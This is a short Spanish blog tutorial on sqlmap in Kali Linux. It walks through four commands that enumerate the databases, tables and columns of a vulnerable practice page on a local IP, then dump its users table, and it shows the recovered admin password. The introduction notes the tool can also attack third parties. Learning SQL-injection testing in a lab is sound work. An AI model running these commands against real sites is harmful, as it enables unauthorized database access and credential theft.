Sqlmap en Kali Linux

Introducción

SqlMap es una ligera pero potente herramienta que nos ayuda encontrar vulnerabilidades web-mysql en nuestros sitios web. SqlMap lo que hace es buscar alguna forma de inyectar sql y asi obtener accesos elevados. Podríamos usar esta herramienta ya sea para encontrar vulnerabilidades en nuestros sistema o para atacar a terceros. en este tutorial voy a mostrar algunos comandos basicos y una prueba de ataque y acceso a una pagina vulnerable

Instalación

1.- Vamos a obtener la bd

sqlmap -u http://192.168.8.103/cat.php?id=2 --dbs

Esto nos debe de regresar algo asi
2018 12 20 09 07

2.- Ahora vamos a sacar las tablas de la bd photoblog que obtuvimos previamente

sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog --tables

Este es el resultado
2018 12 20 09 59

3.- Una vez obtenidas las columnas vamos a sacar las columnas de tabla users asi:

sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users --columns

Este es el resultado:
2018 12 20 10 06

4.- Una vez obtenidas las columnas vamos a sacar los registros de las columnas:

sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users -C id,login,password --dump

Listo hemos obtenido el usuario y password.
User: admin
Password: P4ssw0rd
2018 12 20 10 09

Ads Blocker Image Powered by Code Help Pro

Ads Blocker Detected!!!

En Programador Novato vivimos de los anuncios, hemos detectado que está utilizando extensiones para bloquear anuncios. Ayudanos deshabilitando tu bloqueador de anuncios. :)